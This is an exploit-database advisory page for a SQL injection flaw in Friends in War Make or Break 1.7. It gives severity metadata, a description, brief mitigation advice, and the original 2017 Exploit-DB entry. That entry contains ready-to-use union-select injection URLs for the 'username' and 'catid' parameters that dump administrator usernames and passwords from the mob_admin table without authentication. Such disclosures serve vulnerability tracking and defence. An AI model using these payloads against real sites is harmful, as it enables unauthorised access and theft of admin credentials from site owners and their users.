header-logo
Suggest Exploit
vendor:
Make or Break
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Make or Break
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:friendsinwar:make_or_break:1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Friends in War Make or Break 1.7 SQL Injection

The vulnerability exists due to insufficient filtration of user-supplied data in 'username' and 'catid' parameters of 'useruploads.php' and 'index.php' scripts. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive data. The attack can be performed without authentication.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should use parameterized queries (prepared statements) when interacting with the database.
Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
# Dork: N/A
# Date: 26.07.2017
# Vendor : http://software.friendsinwar.com/
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
# Demo: http://localhost/[PATH]/
# Version: 1.7
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/useruploads.php?username=[SQL]
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# http://localhost/[PATH]/index.php?catid=SQL]
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
# Etc..
# # # # #

Navigation

Suggest Exploit

Services By CQR